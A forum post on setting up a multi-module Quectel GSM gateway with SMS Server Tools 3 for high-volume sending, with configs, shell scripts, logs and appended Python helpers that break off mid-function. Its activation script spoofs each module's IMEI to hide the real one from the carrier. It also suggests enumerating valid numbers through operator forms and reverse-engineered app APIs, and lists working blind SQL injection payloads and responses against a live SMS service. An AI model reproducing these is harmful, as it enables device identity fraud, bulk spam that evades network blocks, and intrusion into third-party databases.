
GSM SMS Server Tools 3 - Quectel M35

swiss
floppy-disk (rank) | Member | Registered: 07.12.2024 | Posts: 2 | Reactions: 5
I had a task to set up an SMS gateway powered by eight Quectel M35 GSM/GPRS modules. The choice was the M35 because 2G bands work on this network service provider and due to the well-written documentation on this chip. After carefully looking through the available SMS gateway software, I decided to go with SMS Server Tools 3 due to its stability, good documentation and command-line-only interface. The SMS gateway is connected to a single-board computer via a USB A-B cable.

The device is detected with the `cdc_acm` kernel driver even though it's an AT command device.

Bash:
[  308.213583] usb 1-1.3: new high-speed USB device number 5 using dwc_otg
[  308.314327] usb 1-1.3: New USB device found, idVendor=1a40, idProduct=0201, bcdDevice= 1.00
[  308.314347] usb 1-1.3: New USB device strings: Mfr=0, Product=1, SerialNumber=0
[  308.314361] usb 1-1.3: Product: USB 2.0 Hub [MTT]
[  308.315233] hub 1-1.3:1.0: USB hub found
[  308.315450] hub 1-1.3:1.0: 7 ports detected
[  308.625586] usb 1-1.3.1: new full-speed USB device number 6 using dwc_otg
[  308.748111] usb 1-1.3.1: New USB device found, idVendor=04e2, idProduct=1414, bcdDevice= 0.03
[  308.748136] usb 1-1.3.1: New USB device strings: Mfr=0, Product=0, SerialNumber=0
[  308.771313] cdc_acm 1-1.3.1:1.0: ttyACM0: USB ACM device
[  308.772557] cdc_acm 1-1.3.1:1.2: ttyACM1: USB ACM device
[  308.773729] cdc_acm 1-1.3.1:1.4: ttyACM2: USB ACM device
[  308.774931] cdc_acm 1-1.3.1:1.6: ttyACM3: USB ACM device
[  308.775673] usbcore: registered new interface driver cdc_acm
[  308.775686] cdc_acm: USB Abstract Control Model driver for USB modems and ISDN adapters
[  308.853622] usb 1-1.3.2: new full-speed USB device number 7 using dwc_otg
[  308.975991] usb 1-1.3.2: New USB device found, idVendor=04e2, idProduct=1414, bcdDevice= 0.03
[  308.976013] usb 1-1.3.2: New USB device strings: Mfr=0, Product=0, SerialNumber=0
[  308.978515] cdc_acm 1-1.3.2:1.0: ttyACM4: USB ACM device
[  308.980859] cdc_acm 1-1.3.2:1.2: ttyACM5: USB ACM device
[  308.984521] cdc_acm 1-1.3.2:1.4: ttyACM6: USB ACM device
[  308.994200] cdc_acm 1-1.3.2:1.6: ttyACM7: USB ACM device

Shared memory allocator library `libmm` is a requirement for statistics support in SMSd. I've had some issues building it on NetBSD.

The SMSd Makefile is located in the src directory. Modify CFLAGS to include `libmm` and `NUMBER_OF_MODEMS`; the maximum is 64.

Makefile:
CFLAGS = -D NUMBER_OF_MODEMS=8
CFLAGS += -I/usr/local/include -L/usr/local/lib
CFLAGS += -fcommon
CFLAGS += -D_FILE_OFFSET_BITS=64

all: smsd

# the conditionals are evaluated at parse time; the $(CC) recipe lines must be indented with a tab
smsd: smsd.c extras.o locking.o cfgfile.o logging.o alarm.o smsd_cfg.o charset.o stats.o blacklist.o whitelist.o modeminit.o pdu.o charshift.o
ifneq (,$(findstring SOLARIS,$(CFLAGS)))
  ifeq (,$(findstring DISABLE_INET_SOCKET,$(CFLAGS)))
    override LFLAGS += -lsocket -lnsl
  endif
endif
ifneq (,$(findstring NOSTATS,$(CFLAGS)))
	$(CC) $(CFLAGS) -o $@ $^ $(LFLAGS)
else
	$(CC) `mm-config --cflags` $(CFLAGS) -o $@ $^ `mm-config --ldflags --libs` $(LFLAGS)
endif

clean:
	rm -f *.o smsd *~

To simplify the activation of a hundred SIM cards, I have written a small shell script. Prepare the IMEI list in `imei.txt`, one per line. The script automatically sets an unused IMEI on the module, then asks for the phone number and PIN, which are stored together with the IMEI for reference. Checks are added for almost every step. The SIM PIN is removed for easier maintenance, and a call to the phone number itself is made to activate the SIM card; it returns busy and takes no balance. An invalid IMEI is likely not to be accepted by the network service provider, nor by the module. The script takes a first argument which should be an existing ttyACM device. The SIM card is not to be inserted until the script says so; this is to prevent the original IMEI leaking to the service provider. The script uses `socat` to communicate with the modem via `AT` commands.

Bash:
#!/bin/bash
# Usage: ./activate.sh N   (N is the index of an existing /dev/ttyACMN device)
# Expects imei.txt in the current directory, one IMEI per line; a used line gets
# "|number|PIN" appended. Insert the SIM card only when the script says so.
[ -z "$1" ] && { echo "usage: $0 <ttyACM index>" >&2; exit 1; }

for i in $1; do
    DEVICE="/dev/ttyACM$i,crnl"
    echo "AT" | socat - "${DEVICE}"

    echo "# Switch modem state"
    STATE=$(echo "AT+CFUN=4" | socat - "${DEVICE}" | grep -Eo 'OK')
    [ "${STATE}" != "OK" ] && exit 1

    echo "# Check network state"
    NETWORK_STATE=$(echo "AT+COPS?" | socat - "${DEVICE}" | grep -o "+COPS: 0")
    [ "${NETWORK_STATE}" != "+COPS: 0" ] && exit 1

    echo "# Check module status"
    STATUS=$(echo "AT" | socat - "${DEVICE}" | grep -Eo 'OK')
    [ "${STATUS}" != "OK" ] && exit 1

    echo "# Spoof IMEI"
    CHIP_IMEI=$(echo "AT+CGSN" | socat - "${DEVICE}" | grep -Eo '[0-9]+')
    [ ${#CHIP_IMEI} -ne 15 ] && exit 1

    # the first line without a "|number|PIN" suffix is still unused
    UNUSED_IMEI=$(grep -v '|' imei.txt | head -n 1)
    [ -z "${UNUSED_IMEI}" ] && { echo "no unused IMEI left in imei.txt" >&2; exit 1; }
    SET_IMEI=$(echo "AT+EGMR=1,7,\"${UNUSED_IMEI}\"" | socat - "${DEVICE}")

    # power-cycle the radio so the new IMEI is read back
    echo "AT+CFUN=0" | socat - "${DEVICE}"
    echo "AT+CFUN=4" | socat - "${DEVICE}"

    SPOOFED_IMEI=$(echo "AT+CGSN" | socat - "${DEVICE}" | grep -Eo '[0-9]+')
    [ "${SPOOFED_IMEI}" != "${UNUSED_IMEI}" ] && exit 1

    echo
    echo "CHIP_IMEI: ${CHIP_IMEI}"
    echo "SPOOFED_IMEI: ${SPOOFED_IMEI}"

    echo "# Insert SIM card"

    # AT+CPIN? answers ERROR until a SIM is present
    while true; do
            SIM_STATE=$(echo "AT+CPIN?" | socat - "${DEVICE}" | grep -o "ERROR")

            if [ "${SIM_STATE}" != "ERROR" ]; then
                    break
            fi
            echo "Waiting."
            sleep 5
    done

    echo "# Insert SIM card number"
    read -r SIMNUM
    echo "# Insert SIM card PIN"
    read -r SIMPIN
    echo "# Inserted"
    # record number and PIN next to the exact IMEI line
    sed -i "/^${UNUSED_IMEI}$/s/$/|${SIMNUM}|${SIMPIN}/" imei.txt

    echo "# Switch modem state"
    STATE=$(echo "AT+CFUN=1" | socat - "${DEVICE}" | grep -Eo 'OK$')
    [ "${STATE}" != "OK" ] && exit 1

    echo "# Enter SIM card PIN"
    echo "AT+CPIN=\"${SIMPIN}\"" | socat - "${DEVICE}"; sleep 3
    # disable the SIM PIN lock ("SC" facility)
    echo "AT+CLCK=\"SC\",0,\"${SIMPIN}\"" | socat - "${DEVICE}"; sleep 15

    echo "# Activate SIM card"
    echo "ATD${SIMNUM}" | socat - "${DEVICE}"; sleep 5
    echo "ATH" | socat - "${DEVICE}"; sleep 10
    echo -e "AT+CMGF=1 \n AT+CMGL=\"ALL\" \n AT+CPMS?" | socat - "${DEVICE}"
done

Here is the SMSd configuration (/etc/smsd.conf) after many days of configuring, testing and optimizing. Read it very carefully.

Refer to the official documentation: https://smstools3.kekekasvi.com/index.php?p=configure

Code:
# the modules configured
devices = GSM1, GSM2, GSM3

# directory structure
outgoing = /home/smsd/sms/outgoing
checked = /home/smsd/sms/checked
incoming = /home/smsd/sms/incoming
failed = /home/smsd/sms/failed
sent = /home/smsd/sms/sent
phonecalls = /home/smsd/sms/calls
report = /home/smsd/sms/report
infofile = /home/smsd/smsd/smsd.info
pidfile = /home/smsd/smsd/smsd.pid
stats = /home/smsd/smsd/stats

# logging
loglevel = 7
logfile = /home/smsd/smsd/smsd.log

# drop privileges
user = smsd
group = dialout
umask = 077

# pre-processing / load-balancer
# checkhandler = /home/smsd/scripts/check.sh

# see exact data which is received from the modem
log_read_from_modem = yes

# timestamp and uptime are printed to the end of status file
status_include_uptime = yes

# INFO: empty the first SIM card memory before sending SM (default: no)
# NOTE: appears to slow down sending
# receive_before_send = yes

#errorsleeptime = 5

# wait after consecutive failed sends
blockafter = 100
blocktime = 3600

#blacklist = /etc/smstools/blacklist
#whitelist = /etc/smstools/whitelist

# messages using iso or gsm are stored as utf8
#alphabet = UTF
incoming_utf8 = yes

# speed
#logtime_us = yes
#logtime_ms = yes
#log_read_timing = yes
trust_outgoing = yes

[queues]
MAIN = /home/smsd/sms/queues/main
GSM1 = /home/smsd/sms/queues/q1
GSM2 = /home/smsd/sms/queues/q2
GSM3 = /home/smsd/sms/queues/q3

[default]
# INFO: the CNMI is modified here to route status reports from the modem to the SMSd.
init = AT+CPMS="SM","SM","SM";+CNMI=2,1,0,1,0

# INFO: new message priority checking | 0 = no | 1 = normal priority | 2 = high priority
incoming = 1
baudrate = 115200

# INFO: CMGL is used to check messages, message is deleted after it is read
# NOTE: when '5' is used, incoming UTF-8 incoming messages appear as multipart where parts never arrive and SMS stay on SM
check_memory_method = 3

# INFO: 1 = network registration is always checked | 2 = network registration is checked only when preparing to send messages. This is how we know we have been blocked rather than just send without checking.
check_network = 2

# time_to_send_pdu = read_timeout * read_timeout_pdu
#read_timeout = 5
#read_timeout_pdu = 8

pin = ignore
report_device_details = yes
send_retries = 0
decode_unicode_text = yes

# speed
#poll_faster = 5
#delaytime = 3

# reporting
report = yes # should be yes for reporting to work
detect_message_routing = yes # should be yes for reporting to work
routed_status_report_cnma = no
using_routed_status_report = no

# log and hangup incoming calls
phonecalls = clip
hangup_incoming_call = yes

# event
eventhandler = /home/smsd/scripts/event.sh

[GSM1]
device = /dev/ttyACM0
queues = GSM1, MAIN

[GSM2]
device = /dev/ttyACM1
queues = GSM2, MAIN

[GSM3]
device = /dev/ttyACM2
queues = GSM3, MAIN

With this configuration it's possible to send ~450-700 messages per module per hour; given that our device has eight modules, that is approx. 115,000 messages per day. The speed depends on phone number database quality, network registration status checking (`check_network`), delivery reports and other factors. At times some modules can behave differently in terms of speed.

The UTF character set uses two bytes, thus lowering the number of characters that can be sent in one message. The encoding is set for the whole message. If you do not need UTF, use ASCII (default).

Queues can be used to differentiate between multiple network service providers and to reduce sending costs by detecting the receiver phone number's network and placing the message in the correct queue. The load-balancing shell script mentioned later can be useful for such tasks.

Some message storages (SM, MT, ME) are faster than others, and some might not even work correctly on your device.

The whitelist/blacklist is useful for blocking numbers that opted out of receiving SMS.

Each GSM interface can be configured independently, however they all include the `[default]` section.

The event handler is executed after receiving an event. It modifies the sent message file with information from the delivery report. The intention is to have clean reports. It might be required to build `formail` unless it exists in your package manager.

Bash:
#!/bin/bash

###
# Update sent file with information from status report (well tested)
# smsd calls this as: event.sh <event> <file> [<message id>]
###

if [ "$1" = "REPORT" ]; then
  SENTDIR=/home/smsd/sms/sent
  if grep -q "Status: 0" "$2"; then
    FROM=$(formail -zx From: < "$2")
    RECEIVED=$(formail -zx Received: < "$2")
    TMPFILE=$(mktemp /tmp/smsd_XXXXXX)
    # the report body (headers stripped, first two lines dropped) carries the Message_id line
    formail -I "" < "$2" | sed -e '1,2d' > "$TMPFILE"
    MESSAGE_ID=$(formail -zX Message_id: < "$TMPFILE")
    # find the sent file(s) containing exactly that Message_id line
    grep -lx "$MESSAGE_ID" "$SENTDIR"/* > "$TMPFILE"
    while read -r FNAME; do
      OLDRECEIVED=$(formail -zx Received: < "${FNAME}")
      if [ "$OLDRECEIVED" = "" ]; then
        # normalise a leading '+' to '00' so To: can be compared with the report's From:
        TO=$(formail -zx To: < "${FNAME}" | sed 's/+/00/')
        if [ "$TO" = "$FROM" ]; then
          TMPFILE2=$(mktemp /tmp/smsd_XXXXXX)
          cp "${FNAME}" "$TMPFILE2"
          formail -f -I "Received: $RECEIVED" < "$TMPFILE2" > "${FNAME}"
          unlink "$TMPFILE2"
        fi
      fi
    done < "$TMPFILE"
    unlink "$TMPFILE"
  fi
fi

###
# Reply with SMS to incoming phone call (untested)
###

#if [ "$1" = "CALL" ]; then
  #TO=$(formail -zx From: < "$2")
  #FILE=$(mktemp /tmp/send_XXXXXX)
  #echo "To: $TO" > "$FILE"
  #echo "" >> "$FILE"
  #echo "This number only accepts SMS." >> "$FILE"
  #FILE2=$(mktemp /home/smsd/sms/outgoing/send_XXXXXX)
  #mv "$FILE" "$FILE2"
#fi

exit 0

If I recall correctly, SMSd checks the shell script's exit code.

Check shell script (`checkhandler`) is executed before sending a message which can be used as load-balancer across multiple modules. Due to my sending script design, the checkhandler is not used anymore. It's added here for reference.

Bash:
#!/bin/bash

# Directory where modem statistics are stored (not used by this script).
STATSDIR="/home/smsd/smsd/stats"
# Directory holding one sub-directory per queue; names must match the [queues] section of smsd.conf.
QUEUESDIR="/home/sms/queues"

# Modems and their corresponding queues.
MODEMS=("GSM1" "GSM2")
QUEUES=("GSM1" "GSM2")

# Verify that the number of modems equals the number of queues.
if [ ${#MODEMS[@]} -ne ${#QUEUES[@]} ]; then
  echo "ERROR: The number of modems and queues must match." >&2
  exit 1
fi

# Function to get the number of message files waiting in a queue.
get_modem_count() {
  local queue=$1
  local counter
  counter=$(find "$QUEUESDIR/$queue" -maxdepth 1 -type f | wc -l)
  echo "$counter"
}

# Main function to determine the appropriate queue for the message.
assign_to_queue() {
  local message_file=$1
  # formail exits 0 even when the header is absent, so test the output instead of chaining with ||
  local queue_assigned
  queue_assigned=$(formail -zx Queue: < "$message_file")
  [ -z "$queue_assigned" ] && queue_assigned=$(formail -zx Provider: < "$message_file")

  # Skip queue assignment if it's already defined.
  if [ -n "$queue_assigned" ]; then
    return
  fi

  local lowest_count=-1
  local selected_queue=""

  # Find the queue associated with the modem having the lowest message count.
  for i in "${!QUEUES[@]}"; do
    local count
    count=$(get_modem_count "${QUEUES[$i]}")
    if [[ $lowest_count -eq -1 || $count -lt $lowest_count ]]; then
      lowest_count=$count
      selected_queue=${QUEUES[$i]}
    fi
  done

  # Assign the message to the determined queue by adding a Queue: header.
  if [ -n "$selected_queue" ]; then
    local temp_file
    temp_file=$(mktemp)
    cp "$message_file" "$temp_file"
    formail -f -I "Queue: $selected_queue" < "$temp_file" > "$message_file"
    rm "$temp_file"
  fi
}

# Execute the main function with the path to the message file as an argument.
assign_to_queue "$1"

sleep 1; exit 0

The following shell script is used to initiate sending; it places a message-formatted file in a queue that SMSd picks up and processes. Numbers are loaded in international format from the `numbers.txt` file. The modem or queue that should process the message can be defined by placing the message file in the correct `WORKDIR`, or by defining a `MODEM` and/or `QUEUE` variable in the message file. From what I remember, the values in the message file override the `WORKDIR`. `Report:` overrides `report` in the smsd configuration.

Bash:
#!/bin/bash
WORKDIR="/home/smsd/sms/queues/q3"
MESSAGE="Hello World"
MODEM="GSM1"
QUEUE="GSM1"

# one message file per line of numbers.txt; headers, blank line, then the body
while read -r NUMBER; do
        [ -z "${NUMBER}" ] && continue
        FILENAME="${WORKDIR}/$(date +%Y%m%d-%T.%N).txt"
        {
                echo "To: ${NUMBER}"
                #echo "Modem: ${MODEM}"
                #echo "Queue: ${QUEUE}"
                #echo "Report: no"
                echo ""
                echo "${MESSAGE}"
        } > "${FILENAME}"
done < numbers.txt

This is what a successfully delivered message report looks like. Notice the `Received` value; remember that this comes from the event handler script, which exported the value from the status report file and added it to the main message file.

Bash:
-bash-5.2# cat 20241004-13:21:27.996134917.txt
To: +40731234567
Modem: GSM1
Sent: 24-10-04 13:21:30
Sending_time: 3
Message_id: 242
IMSI: xxxxxxxxxxxxxxx
IMEI: xxxxxxxxxxxxxxx
Received: 24-10-04 13:23:17

Hello World

If the SMSd has been built with `libmm`, then statistics should be available.

Bash:
-bash-5.2# ls -la /home/smsd/smsd/stats
total 96
drwxr-xr-x 2 smsd users 4096 Oct  4  2024 .
drwx------ 3 smsd users 4096 Oct  4  2024 ..
-rw------- 1 smsd users  163 Oct  4  2024 241004.080000
-rw------- 1 smsd users  164 Oct  4  2024 241004.090000
-rw------- 1 smsd users  155 Oct  4  2024 241004.100000
-rw------- 1 smsd users  152 Oct  4  2024 241004.110000
-rw------- 1 smsd users  159 Oct  4  2024 241004.120000
-rw------- 1 smsd users  163 Oct  4  2024 241004.130000
-rw------- 1 smsd users   11 Oct  4  2024 GSM1.counter
-rw------- 1 smsd users   11 Oct  4  2024 GSM2.counter
-rw------- 1 smsd users   11 Oct  4  2024 GSM3.counter
-rw------- 1 smsd users  416 Oct  4  2024 stats.tmp

-bash-5.2# cat *.counter
GSM1: 9355
GSM2: 9267
GSM3: 7192

-bash-5.2# cat 241004.130000
runtime,rejected
3567,0

name,succeeded,failed,received,multiple_failed,usage_s,usage_r
GSM1,542,2,530,0,2785,31
GSM2,533,1,481,0,2765,19
GSM3,550,0,475,0,2796,16

It's possible to display the status monitor in live mode using the `-s` option.

Bash:
-bash-5.2# smsd -h
smsd spools incoming and outgoing sms.

Options:
         -a  ask config settings
         -cx set config file to x
         -Dx decode GSM 7bit Packed string x
         -Ex encode string x to GSM 7bit Packed format
         -ix set infofile to x
         -px set pidfile to x
         -lx set logfile to x
         -nx set process name argument to x
         -ux set username to x
         -gx set groupname to x
         -h, -? show this help
         -s  display status monitor
         -t  run smsd in terminal
         -Cx Communicate with device x
         -V  print copyright and version

Here is what a missed call looks like:

Bash:
-bash-5.2# cat GSM1.Bp96I8
From: 40731234567
From_TOA: 73 international, ISDN/telephone
Subject: GSM1
Modem: GSM1
IMSI: xxxxxxxxxxxxxxx
IMEI: xxxxxxxxxxxxxxx
Call_type: missed
Received: 24-10-04 13:25:59

CALL MISSED

This is the SMSd sending log, to get some understanding of the process.

Bash:
2024-10-04 00:00:00,2, smsd: Smsd v3.1.21 started.
2024-10-04 00:00:00,2, smsd: Running as smsd:users (1003:100).
2024-10-04 00:00:00,7, smsd: Running startup_check (shell): /home/smsd/sms/incoming/smsd_script.70K5LD /tmp/smsd_data.MtOPdP
2024-10-04 00:00:00,7, smsd: Done: startup_check (shell), execution time 0 sec., status: 0 (0)
2024-10-04 00:00:00,4, smsd: File mode creation mask: 077 (0600, rw-------).
2024-10-04 00:00:00,2, smsd: Running in terminal mode.
2024-10-04 00:00:00,5, smsd: Outgoing file checker has started. PID: 1632.
2024-10-04 00:00:00,7, smsd: All PID's: 1632,1635
2024-10-04 00:00:00,5, GSM1: Modem handler 0 has started. PID: 1635.
2024-10-04 00:00:00,5, GSM1: Serving queues: GSM1, MAIN
2024-10-04 00:00:00,5, GSM1: Using check_memory_method 3: CMGL is used.
2024-10-04 00:00:00,5, GSM1: Using send_retries 0.
2024-10-04 00:00:00,5, GSM1: Using delaytime 3 sec.
2024-10-04 00:00:00,6, GSM1: I have to send 1 short message for /home/smsd/sms/queues/q1/20241004-13:21:27.996134917.txt
2024-10-04 00:00:00,6, GSM1: Sending SMS from  to 40731234567
2024-10-04 00:00:00,6, GSM1: Checking if modem is ready
2024-10-04 00:00:00,7, GSM1: -> AT
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,6, GSM1: Pre-initializing modem
2024-10-04 00:00:00,7, GSM1: -> ATE0
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,7, GSM1: -> AT+CMEE=1;+CLIP=1;+CREG=2
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,6, GSM1: Initializing modem
2024-10-04 00:00:00,7, GSM1: -> AT+CPMS="SM","SM","SM";+CNMI=2,1,0,1,0
2024-10-04 00:00:00,7, GSM1: <- +CPMS: 0,20,0,20,0,20 OK
2024-10-04 00:00:00,7, GSM1: -> AT+CSQ
2024-10-04 00:00:00,7, GSM1: <- +CSQ: 21,0 OK
2024-10-04 00:00:00,6, GSM1: Signal Strength Indicator: (21,0) -71 dBm (Excellent), Bit Error Rate: less than 0.2 %
2024-10-04 00:00:00,6, GSM1: Checking if Modem is registered to the network
2024-10-04 00:00:00,7, GSM1: -> AT+CREG?
2024-10-04 00:00:00,7, GSM1: <- +CREG: 2,1,"xxxx","xxxx" OK
2024-10-04 00:00:00,6, GSM1: Modem is registered to the network
2024-10-04 00:00:00,6, GSM1: Location area code: xxxx, Cell ID: xxxx
2024-10-04 00:00:00,7, GSM1: -> AT+CSQ
2024-10-04 00:00:00,7, GSM1: <- +CSQ: 21,0 OK
2024-10-04 00:00:00,6, GSM1: Signal Strength Indicator: (21,0) -71 dBm (Excellent), Bit Error Rate: less than 0.2 %
2024-10-04 00:00:00,6, GSM1: Selecting PDU mode
2024-10-04 00:00:00,7, GSM1: -> AT+CMGF=0
2024-10-04 00:00:00,7, GSM1: <- OK
2024-10-04 00:00:00,7, GSM1: -> AT+CGSN
2024-10-04 00:00:00,7, GSM1: <- xxxxxxxxxxxxxx OK
2024-10-04 00:00:00,5, GSM1: IMEI: xxxxxxxxxxxxxx
2024-10-04 00:00:00,7, GSM1: -> AT+CIMI
2024-10-04 00:00:00,7, GSM1: <- xxxxxxxxxxxxxxx OK
2024-10-04 00:00:00,5, GSM1: IMSI: xxxxxxxxxxxxxxx
2024-10-04 00:00:00,6, GSM1: Checking if reading of messages is supported
2024-10-04 00:00:00,7, GSM1: -> AT+CPMS?
2024-10-04 00:00:00,7, GSM1: <- +CPMS: "SM",0,20,"SM",0,20,"SM",0,20 OK
2024-10-04 00:00:00,7, GSM1: ## Start of device details
2024-10-04 00:00:00,7, GSM1: # Manufacturer identification:
2024-10-04 00:00:00,7, GSM1: -> AT+CGMI
2024-10-04 00:00:00,7, GSM1: <- Quectel_Ltd
2024-10-04 00:00:00,7, GSM1: # Model identification:
2024-10-04 00:00:00,7, GSM1: -> AT+CGMM
2024-10-04 00:00:00,7, GSM1: <- Quectel_M35
2024-10-04 00:00:00,7, GSM1: # Revision identification:
2024-10-04 00:00:00,7, GSM1: -> AT+CGMR
2024-10-04 00:00:00,7, GSM1: <- Revision: M35AR01A36
2024-10-04 00:00:00,7, GSM1: # New message indications, list of supported modes:
2024-10-04 00:00:00,7, GSM1: -> AT+CNMI=?
2024-10-04 00:00:00,7, GSM1: <- +CNMI: (0-3),(0-3),(0,2,3),(0,1),(0,1)
2024-10-04 00:00:00,7, GSM1: # New message indications, current settings:
2024-10-04 00:00:00,7, GSM1: -> AT+CNMI?
2024-10-04 00:00:00,7, GSM1: <- +CNMI: 2,1,0,1,0
2024-10-04 00:00:00,7, GSM1: # Preferred message storage, list of supported mem's:
2024-10-04 00:00:00,7, GSM1: -> AT+CPMS=?
2024-10-04 00:00:00,7, GSM1: <- +CPMS: ("SM", "ME", "MT"), ("SM", "ME", "MT"), ("SM", "ME", "MT")
2024-10-04 00:00:00,7, GSM1: # Phonebook storage, available mem's:
2024-10-04 00:00:00,7, GSM1: -> AT+CPBS=?
2024-10-04 00:00:00,7, GSM1: <- +CPBS: ("MC","RC","DC","LA","ME","BN","SD","VM","FD","LD","ON","SM")
2024-10-04 00:00:00,7, GSM1: # List messages, list of supported stat's:
2024-10-04 00:00:00,7, GSM1: -> AT+CMGL=?
2024-10-04 00:00:00,7, GSM1: <- +CMGL: (0-4)
2024-10-04 00:00:00,7, GSM1: # Delete message, list of supported values:
2024-10-04 00:00:00,7, GSM1: -> AT+CMGD=?
2024-10-04 00:00:00,7, GSM1: <- +CMGD: (1-20),(0-4)
2024-10-04 00:00:00,7, GSM1: # Phone activity status, list of supported stat's:
2024-10-04 00:00:00,7, GSM1: -> AT+CPAS=?
2024-10-04 00:00:00,7, GSM1: <- +CPAS: (0,2,3,4)
2024-10-04 00:00:00,7, GSM1: # TE character set, list of supported charset's:
2024-10-04 00:00:00,7, GSM1: -> AT+CSCS=?
2024-10-04 00:00:00,7, GSM1: <- +CSCS: ("GSM","HEX","IRA","PCCP437","UCS2","8859-1")
2024-10-04 00:00:00,7, GSM1: # TE character set, current setting:
2024-10-04 00:00:00,7, GSM1: -> AT+CSCS?
2024-10-04 00:00:00,7, GSM1: <- +CSCS: "GSM"
2024-10-04 00:00:00,7, GSM1: ## End of device details
2024-10-04 00:00:00,7, GSM1: -> AT+CMGS=112
2024-10-04 00:00:00,7, GSM1: <- >
2024-10-04 00:00:00,7, GSM1: -> PDU_REMOVED
2024-10-04 00:00:00,7, GSM1: <- +CMGS: 0 OK
2024-10-04 00:00:00,5, GSM1: SMS sent, Message_id: 0, To: 40731234567, sending time 3 sec.
2024-10-04 00:00:00,6, GSM1: SMS To: XXXXXXXXXX. Moved file /home/smsd/sms/queues/q1/20241004-13:21:27.996134917.txt to /home/smsd/sms/sent/20241004-13:21:27.996134917.txt
2024-10-04 00:00:00,7, GSM1: Running eventhandler: /home/smsd/scripts/event.sh SENT /home/smsd/sms/sent/20241004-13:21:27.996134917.txt 0
2024-10-04 00:00:00,7, GSM1: Done: eventhandler, execution time 0 sec., status: 0 (0)

The network provider website most likely has a form to add credit to the SIM card, a form to add the phone number to track credit or internet traffic usage, a form to upgrade your prepaid number, a contact form or something similar. These places could have the backend enumerate ranges of random numbers, which can be useful for checking valid/used/activated numbers before sending; a simple shell loop `for range in {00000..99999}` would do. On some providers it was possible to distinguish between business and private mobile phone numbers through a form that offers services to business users only. Furthermore, another possibility is to reverse-engineer an Android application and find out the API endpoints for number validation.

Database injection over SMS

# payload: keyword
# response: OK

# payload: keyword123
# response: invalid keyword specified

# payload: keyword123/#%"!$([/=*]){}:,'.;&
# response: no

The character `'` breaks the backend.

The SMS service responds to requests with `1` and `0` being `true` and `false`.

# payload: keyword\\\\\\\\\\'
# response: no

# payload: keyword' or 1=1--
# response: no

# payload: keyword' or 1=2--'
# response: 0

# payload: keyword' or 1=1--'
# response: 1

# payload: keyword' or sleep(30)--'
# response: 1 (30 seconds later)

# payload: keyword' and substring(@@version, 1, 1)=5--'
# response: 0

# payload: keyword' and substring(@@version, 1, 1)=4--'
# response: 1
 
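The activation script in the post only checks that the IMEI read back from the module is 15 digits long. Every IMEI carries a Luhn check digit, and a value that fails it is exactly the kind of "invalid IMEI" the post expects the network and the module to reject. The example below is added by the editor, not code from the post or from smstools3: it computes and verifies the check digit, picks the first unused line from an `imei.txt` in the post's `IMEI|number|PIN` layout, and records a SIM against it the way the post's `sed -i` does. The IMEIs in the sample are constructed test values and the function names are mine.

```python
import re

# Constructed sample of the post's imei.txt layout: a used line carries "|number|PIN".
# The numbers are test values, not real devices.
IMEI_SAMPLE = [
    "490154203237518|+40731234567|1234",   # already assigned to a SIM
    "123456789012345",                     # 15 digits but wrong check digit
    "352099001761481",                     # unused and valid
]


def luhn_check_digit(body: str) -> str:
    """Check digit for a 14-digit IMEI body (TAC + serial), per the Luhn algorithm."""
    if not re.fullmatch(r"\d{14}", body):
        raise ValueError("IMEI body must be exactly 14 digits")
    total = 0
    for i, ch in enumerate(reversed(body)):
        d = int(ch)
        if i % 2 == 0:              # double every second digit, starting with the last body digit
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return str((10 - total % 10) % 10)


def is_valid_imei(imei: str) -> bool:
    """15 digits whose last digit is the Luhn check digit of the first 14."""
    return bool(re.fullmatch(r"\d{15}", imei)) and luhn_check_digit(imei[:14]) == imei[14]


def next_unused_imei(lines):
    """First valid, unassigned IMEI in imei.txt; also returns the lines that fail the check
    so they can be fixed before AT+EGMR is ever issued with them."""
    chosen, rejected = None, []
    for raw in lines:
        line = raw.strip()
        if not line or "|" in line:       # blank or already assigned
            continue
        if not is_valid_imei(line):
            rejected.append(line)
            continue
        if chosen is None:
            chosen = line
    return chosen, rejected


def record_sim(lines, imei, number, pin):
    """Append '|number|PIN' to the exact IMEI line (what the post's sed -i does). Note that
    this keeps SIM PINs in clear text in imei.txt, so protect the file accordingly."""
    out = []
    for raw in lines:
        line = raw.rstrip("\n")
        if line == imei:
            line = f"{imei}|{number}|{pin}"
        out.append(line)
    return out


if __name__ == "__main__":
    imei, bad = next_unused_imei(IMEI_SAMPLE)
    print("next IMEI:", imei, "rejected:", bad)
    print("\n".join(record_sim(IMEI_SAMPLE, imei, "+40737654321", "0000")))
```

To use it with the post's workflow, run `next_unused_imei` over the real file before the script starts and refuse to continue while `rejected` is non-empty; the shell script itself can keep its `grep -v '|' | head -n 1` selection once the file is known to be clean.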
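The post quotes ~450-700 messages per module per hour and about 115,000 per day for eight modules, and later shows a `libmm` stats file. This added example, written by the editor and not part of the post or of smstools3, parses that stats file format and turns it into the per-modem figures behind those claims: sends per hour, how much of the period the modem was actually busy sending (`usage_s`), and the failure ratio, which is the number to watch for a module that has been blocked by the network. The sample text is the `241004.130000` file listed in the post; the function names are mine.

```python
# Sample input: the 241004.130000 stats file from the post, copied verbatim.
STATS_SAMPLE = """runtime,rejected
3567,0

name,succeeded,failed,received,multiple_failed,usage_s,usage_r
GSM1,542,2,530,0,2785,31
GSM2,533,1,481,0,2765,19
GSM3,550,0,475,0,2796,16
"""


def parse_stats(text):
    """Return (runtime_s, rejected, rows); rows maps a modem name to its counters.
    The file has two CSV blocks separated by a blank line."""
    blocks = [b for b in text.strip().split("\n\n") if b.strip()]
    if len(blocks) != 2:
        raise ValueError("expected a runtime block and a per-modem block")
    runtime, rejected = (int(x) for x in blocks[0].splitlines()[1].split(","))
    lines = blocks[1].splitlines()
    cols = lines[0].split(",")
    rows = {}
    for line in lines[1:]:
        vals = line.split(",")
        rows[vals[0]] = dict(zip(cols[1:], (int(v) for v in vals[1:])))
    return runtime, rejected, rows


def throughput(runtime, rows):
    """Per modem: successful sends per hour, share of the period spent sending, and
    failed/(failed+succeeded) in percent. A modem being blocked by the network shows
    a dropping per_hour together with a rising fail_pct."""
    result = {}
    for name, r in rows.items():
        attempts = r["succeeded"] + r["failed"]
        result[name] = {
            "per_hour": round(r["succeeded"] * 3600 / runtime),
            "busy_pct": round(100 * r["usage_s"] / runtime),
            "fail_pct": round(100 * r["failed"] / attempts, 1) if attempts else 0.0,
        }
    return result


def daily_capacity(rates, modems):
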